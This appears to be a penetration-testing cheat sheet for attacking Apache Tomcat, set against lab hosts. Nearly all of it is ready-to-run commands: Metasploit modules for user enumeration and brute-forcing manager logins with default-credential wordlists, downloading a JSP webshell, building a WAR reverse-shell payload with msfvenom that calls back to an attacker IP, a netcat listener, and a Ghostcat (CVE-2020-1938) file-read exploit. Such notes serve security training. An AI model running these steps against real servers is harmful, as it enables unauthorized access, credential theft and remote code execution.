Tomcat

Discovery

Via 404 page

Via /docs page

$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat

Important Files

WEB-INF/web.xml (deployment descriptor)

  • important to check when leveraging LFI

WEB-INF/classes/ might contain business logics and sensitive information

tomcat-users.xml file is used to allow or disallow access to the /manager and /host-manager

Username Enumeration

msf6 > use auxiliary/scanner/http/tomcat_enum

Exploitation

Finding login page

msf6 > use auxiliary/scanner/http/tomcat_mgr_login

Login Bruteforce

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST web01.inlanefreight.local
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.201.58
$ git clone https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce
$ $ python3 mgr_brute.py -U http://web01.inlanefreight.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

Code Execution

Go to /manager/html and upload a war file

$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
$ zip -r backup.war cmd.jsp 
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war
$ nc -nlvp 4443
$ msfconsole
msf6 > use multi/http/tomcat_mgr_upload

Use this webshell for a stealthy approcah https://github.com/SecurityRiskAdvisors/cmd.jsp

Ghostcat (CVE-2020-1938)

versions before 9.0.31, 8.5.51, and 7.0.100

$ nmap -sV -p 8009,8080 app-dev.inlanefreight.local

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 20:05 EDT
Nmap scan report for app-dev.inlanefreight.local (10.129.201.58)
Host is up (0.14s latency).

PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat 9.0.30

$ wget https://raw.githubusercontent.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py
$ python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml
PreviousDrupalNextJenkins

Last updated